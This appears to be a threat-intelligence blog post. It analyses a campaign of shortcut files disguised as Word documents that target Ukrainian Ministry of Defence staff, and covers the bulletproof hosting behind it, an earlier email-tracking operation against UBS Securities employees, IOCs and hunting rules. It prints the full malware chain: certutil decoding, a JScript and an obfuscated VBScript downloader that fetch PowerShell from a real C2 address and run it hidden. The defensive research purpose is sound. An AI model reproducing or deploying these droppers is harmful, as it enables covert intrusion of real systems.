.text ; disassembly of nakaz-mo-ukraine.md

NAKAZ MO: Property Declaration Lure Targeting Ukrainian Ministry of Defence Personnel

The file looks like a government document. NAKAZ_MO_perevirka_mayna.docx.lnk. Open it in Windows Explorer and you see a Word icon — the folder has imageres.dll icon resource 97, which maps to a .docx. The extension is hidden by default in Windows. Click it and you have not opened a document.

The actor’s timing is precise. “Nakaz MO” is Ukrainian for “Ministry of Defence Order”. “Perevirka mayna” is “property verification”. Since Russia’s full-scale invasion, Ukrainian legislation requires military and civil service personnel to file mandatory property declarations — a bureaucratic reality that makes this exact document name plausible in any MoD inbox. The second file in the same archive is SPYSOK_mayna.docx.lnk: “property list”.

Whoever made this knows their targets.


What’s in the ZIP

The archive (b4c56effba0516161bf59022f137837ccf852825e5fa09d15b9a8bf8295fbde2, 13KB, 30 VT detections) contains two files:

FileSHA256Detections
NAKAZ_MO_perevirka_mayna.docx.lnk9bd16130d297f639bab147186ce090becb05a1f0e85ee87a8aba3b557e17055822
SPYSOK_mayna.docx.lnkd58243d0a48590eda21876c8130ad984877f8287a159469bcdb5ba1232b46fc221

Both are Windows shortcuts masquerading as Word documents via a double extension and Word icon. Created June 26, 2026 at 10:39:50 UTC. Both target C:\Windows\System32\cmd.exe with SW_SHOWMINNOACTIVE — the window flashes minimised for a fraction of a second, barely visible.


The Kill Chain

Both LNK files run the same four-step pattern, differing only in which PS1 filename they request:

cmd.exe /c
  echo [base64 blob] > yO.b64
  certutil -decode yO.b64 5G9X2.js >nul
  wscript //b 5G9X2.js
  del yO.b64 5G9X2.js

certutil -decode is used here as a LOLBin base64 decoder — it turns the echoed blob into a JavaScript file. wscript //b runs it silently. The decoded JScript (cfe0ff9b5bc1c1c4f07324005eea1fbbeafb29d239b162226decffaa7448675f, 301 bytes, 8 dets) is the actual downloader:

var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
h.open("GET", "http://193.169.194.86/cr44g/fifthbelong.ps1", false);
h.setRequestHeader("User-Agent", "UA WindowsPowerShell");
h.send();
new ActiveXObject("Shell.Application").ShellExecute(
  "powershell.exe",
  "-NoP -W Hidden -C " + h.responseText,
  "", "open", 0
);

The SPYSOK LNK fetches sponsorinput.ps1 from the same path. The PS1 content is passed directly to powershell.exe via -C — it never touches disk.

flowchart LR
    A["NAKAZ_MO_perevirka_mayna\n.docx.lnk"] --> B["cmd.exe /c\necho base64 > yO.b64"]
    B --> C["certutil -decode\nyO.b64 → 5G9X2.js"]
    C --> D["wscript //b 5G9X2.js\nMSXML2.ServerXMLHTTP"]
    D -->|"User-Agent:\nUA WindowsPowerShell"| E["193.169.194.86\n/cr44g/fifthbelong.ps1"]
    E --> F["powershell -NoP -W Hidden\n-C [responseText]"]
    E -->|"sandbox gets"| G["403 Forbidden\ngeo-fenced"]

    style A fill:#b91c1c,color:#fff
    style G fill:#374151,color:#9ca3af
    style E fill:#1e40af,color:#fff
    style F fill:#7f1d1d,color:#fff

The C2 Returns 403 to Every Sandbox

193.169.194.86 runs Apache 2.4.52 on Ubuntu, port 80 only. The CAPE sandbox received this instead of a PowerShell script:

powershell.exe -NoP -W Hidden -C <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>403 Forbidden</title></head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<address>Apache/2.4.52 (Ubuntu) Server at 193.169.194.86 Port 80</address>
</html>

Every sandbox — CAPE, Zenbox, C2AE, VirusTotal Jujubox — got the same 403. The server is authenticating requests: likely checking source IP geolocation against Ukrainian address space, the custom User-Agent, or both. The PS1 payload has never been publicly recovered.

The User-Agent string UA WindowsPowerShell is actor-specific and consistent across every variant. “UA” is the ISO 3166-1 alpha-2 country code for Ukraine. Whether this is a tracking mechanism, a server-side authentication token, or an internal naming convention, it’s a reliable fingerprint for this cluster — and worth hunting in proxy logs.


The Earlier Build: /krr4g/

This is the second time the same infrastructure ran the same lure. One day earlier — June 25, 2026 at 10:00 UTC — an identical ZIP (a1dbae0dd3e1d72f649be1c8a999274a22127ed27165018af1d96b7d6eda9baa, 35 dets) was built with the same LNK filenames, pointed at a different C2 path: /krr4g/.

The obfuscation in v2 is different. Instead of certutil base64 decode, the LNK writes VBScript inline via cmd /v with environment variable string splitting:

cmd /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP"
  && echo Set h=CreateObject("!v!"):h.open "GET",
     "http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:
     h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:
     Set b=CreateObject("ADO"^&"DB.Str"^&"eam"):b.Type=1:b.Open:
     b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2
     > %TEMP%\vVy.vbs
  && cscript //b %TEMP%\vVy.vbs
  && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1
  && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1"

MSXML2.XMLHTTP is rebuilt from parts (!x1!!x2!HTTP) to defeat string-based detection. ADODB.Stream writes the response body as binary to disk before execution. v2 got 34-35 detections. The actor switched to certutil+JScript in v1 and dropped to 21-22 within 24 hours.

BuildDatePathTechniqueDetections
v2 (earlier)2026-06-25/krr4g/VBS inline echo + ADODB.Stream34–35
v1 (later)2026-06-26/cr44g/certutil + JScript via base6421–22

The Internal Codename: Sleestak

A third file on the same C2 — sleestak_payload_1.vbs (a741cbddad59fc56cb42cf49dcd23596ac435df1a5452b1cb1a1672014d4d7f2, 17 dets, first seen June 25, 2026) — fetches http://193.169.194.86/krr4g/angeldogsled.ps1. It’s functionally identical to the VBScript the v2 LNK echoes inline, but uploaded directly to VirusTotal from the actor’s development machine before it was packaged.

“Sleestak” is the internal campaign name — or the name the developer gave the payload on their workstation. It leaked because the actor scanned their own staging file, unaware it would end up in a public repository. In the Land of the Lost, the Sleestak are reptilian cave-dwelling predators that hunt in silence. Whether this is a deliberate codename or an accidental leak of a private naming convention, it’s the only label the actor put on this operation.


Infrastructure

Infrastructure map — SIA GOOD /23 subnet, three servers, four campaigns

HostDetailsRole
193.169.194.86Apache 2.4.52 / Ubuntu / port 80C2 — PS1 staging server
193.169.194.85Apache 2.4.52 / Ubuntu / port 80+22Companion server, same template
193.169.194.92Apache 2.4.52 / Ubuntu / port 80Same subnet, redirects to google.de
ASN 214576”Berdiev Ruslan Mukhabatovich”Bulletproof-adjacent hosting
SIA GOOD, Riga, LatviaRIPE ORG-SG425-RIPEIP block registrant
/cr44g/v1 campaign pathfifthbelong.ps1, sponsorinput.ps1
/krr4g/v2 campaign pathphilanthropyephyra.ps1, angeldogsled.ps1

SIA GOOD (reg. LV 43603067005, Brīvības iela 52, Riga) holds the RIPE block 193.169.194.0/23. The AS is registered under a Central Asian individual name — Latvian-registered, Central Asian-operated, and non-responsive to abuse reports. The .86 server runs Apache 2.4.52 (Ubuntu 22.04 vintage), unpatched since approximately 2022, and has accumulated over 75 CVEs in Shodan’s fingerprint — including CVE-2023-25690 (HTTP request smuggling via mod_proxy, CVSS 9.8) and a cluster of 2024 Apache information-disclosure and SSRF bugs. The operator either doesn’t know or doesn’t care.


Before Sleestak: The UBS Securities Tracking Campaign

Pivoting on the full /23 subnet reveals that .85 and .92 — adjacent servers with identical Apache configurations — were also running port 8888, and their VT URL history tells a different story from the Ukrainian campaign.

Starting in November 2023, someone used these three servers to deploy a self-hosted email open-tracker. The URL pattern is textbook: /o/[target-email]/[guid].gif?sendTime=[timestamp]. When a target opens the phishing email, their mail client fetches the GIF, and the server logs the exact time. The operator sees who read what and when.

The development trail is visible in the data:

ServerDateTarget
.85Nov 29, 2023joe@doe.dom — developer test (.dom is not a real TLD)
.85Dec 8, 2023Secondary Gmail target
.85Dec 15 + Dec 29, 2023joe@doe.dom — more tests
.85Dec 22, 2023UBS Securities employee #1
.85Dec 27, 2023UBS Securities employee #2
.86Apr 1, 2024UBS Securities employee #3 + Gmail target
.92Apr 10, 2024Same Gmail target (re-sent or re-opened)

joe@doe.dom is the actor testing their own platform — four sends across November–December 2023 before they moved to live targets. The email addresses for the UBS employees follow the firstname.lastname@ubssecurities.com format; the targets are confirmed-real UBS Securities personnel. The campaign ran from December 2023 through at least April 2024 across all three servers.

This is not the same operation as Sleestak. The UBS tracking used port 8888; Sleestak used port 80. The techniques and objectives are entirely different: financial sector spear-phishing recon versus a Ukrainian military-targeted malware downloader. What they share is the hosting provider.

That’s the point of bulletproof infrastructure. The IP block stays stable. The tenants rotate. Abuse reports, if any were filed against the UBS campaign, had no effect — the server was still available in June 2026 for the next group.

The full tenant timeline on this /23:

Tenant timeline — 193.169.194.0/23, Nov 2023 to present

PeriodServersCampaign
Nov 2023 – Jan 2024.85, .86Chinese email tracking (heyunyishu.cn, cpcmx.cn)
Dec 2023 – Apr 2024.85, .86, .92UBS Securities financial spear-phishing recon
2024 (concurrent).92Phishing domains (homedeotcomsurvey.cfd, ipl2025.cfd, playrikvip.icu)
Jun 2026.86Sleestak / NAKAZ MO Ukrainian MoD campaign

An unrelated Pcillin_Crack.zip (54 dets, containing Porn_Napster.exe) is currently hosted on the same .86 Apache instance alongside the Sleestak paths — a cracked-software lure from yet another tenant sharing the server.


IOC Summary

ZIP archives

  • b4c56effba0516161bf59022f137837ccf852825e5fa09d15b9a8bf8295fbde2 — v1 (June 26, 13KB, 30 dets)
  • a1dbae0dd3e1d72f649be1c8a999274a22127ed27165018af1d96b7d6eda9baa — v2 (June 25, 13KB, 35 dets)

LNK files (v1)

  • 9bd16130d297f639bab147186ce090becb05a1f0e85ee87a8aba3b557e170558NAKAZ_MO_perevirka_mayna.docx.lnk
  • d58243d0a48590eda21876c8130ad984877f8287a159469bcdb5ba1232b46fc2SPYSOK_mayna.docx.lnk

LNK files (v2)

  • 63369b7db4f2380cc94546870bedf897f37aaf6937e72034d82013b4c904915aNAKAZ_MO_perevirka_mayna.docx.lnk
  • 0ed95c161987e712703a55b56de2d1bbeb6f5f409639d3f3eee6b8e5d7ceceb8SPYSOK_mayna.docx.lnk

Intermediate stages

  • cfe0ff9b5bc1c1c4f07324005eea1fbbeafb29d239b162226decffaa7448675f5G9X2.js (JScript downloader, 8 dets)
  • a741cbddad59fc56cb42cf49dcd23596ac435df1a5452b1cb1a1672014d4d7f2sleestak_payload_1.vbs (development artifact, 17 dets)

C2 / URLs

  • 193.169.194.86 (port 80, AS214576 — block)
  • hxxp://193.169.194.86/cr44g/fifthbelong.ps1
  • hxxp://193.169.194.86/cr44g/sponsorinput.ps1
  • hxxp://193.169.194.86/krr4g/philanthropyephyra.ps1
  • hxxp://193.169.194.86/krr4g/angeldogsled.ps1

Network detection signature

User-Agent: UA WindowsPowerShell

Flag this in proxy logs. It appears in both v1 JScript and v2 VBScript — it’s the only custom header in the downloader and present in every variant.


What To Do

Hunt for the LNK double-extension trick:

Get-ChildItem -Path C:\Users -Recurse -Filter "*.lnk" -ErrorAction SilentlyContinue |
  Where-Object { $_.Name -match "\.docx\.lnk$|\.xlsx\.lnk$|\.pdf\.lnk$" }

Block at proxy / firewall:

193.169.194.85           # companion server, same Apache template
193.169.194.86           # C2, Apache 2.4.52, geo-fenced PS1 host
193.169.194.92           # same /23, google.de redirect evasion
User-Agent: UA WindowsPowerShell   # actor fingerprint — alert on any match

Alert on process chain:

cmd.exe spawning certutil.exe -decode → wscript.exe //b *.js
cmd.exe /v spawning cscript.exe //b *.vbs → powershell.exe -File %TEMP%\*.ps1

The four PS1 files — fifthbelong.ps1, sponsorinput.ps1, philanthropyephyra.ps1, angeldogsled.ps1 — have never been publicly recovered. The C2 serves them only to real Ukrainian targets. The lure, the technique, the timing, and the bulletproof hosting infrastructure are consistent with a Russian-nexus actor that has been running LNK-based campaigns against Ukrainian military and government personnel throughout the war. Specific group attribution — UAC-0010 (Gamaredon/Armageddon) is the most active cluster using these techniques against these targets — cannot be confirmed without the stage-2 payload.

Sleestak was active four days ago.


Passive analysis: VirusTotal (file/URL/behavior APIs), abuse.ch MalwareBazaar, Shodan InternetDB, RIPE WHOIS. No live C2 contact. No credentials tested or used.

← back to listing